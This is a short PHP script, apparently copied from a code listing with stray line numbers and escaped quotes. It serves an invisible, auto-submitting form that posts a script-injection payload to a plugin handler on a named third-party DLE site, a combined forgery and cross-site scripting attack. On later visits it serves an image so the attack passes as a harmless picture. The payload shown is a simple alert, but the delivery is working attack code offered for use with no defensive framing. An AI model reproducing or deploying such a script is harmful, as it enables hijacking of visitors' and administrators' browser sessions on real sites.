1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
<?php
$value = urlencode("<script>alert(\'Hello\');</script>\");
if($_GET[\'unset\'] == \"time\") unset($_COOKIE[\'time\']);
if(!isset($_COOKIE[\'time\']))
{
setcookie(\"time\",time(),time()+3600);
?>
<head>
</head>
<body>
<center>
<form name=\"hack\" action=\"http://dlesite.ru/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php\" method=\"post\">
<input type=\"text\" name=\"text\" value=\'$value\' style=\"boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;\" border=\"0\">
</form>
<script>
document.hack.submit();
</script>
</body>
</html>
<?
}
else {
header(\"Content-type: image/jpg\");
$image = imagecreatefromgif(\'smile.jpg\');
imagegif($image);
imagedestroy($image);
}
?>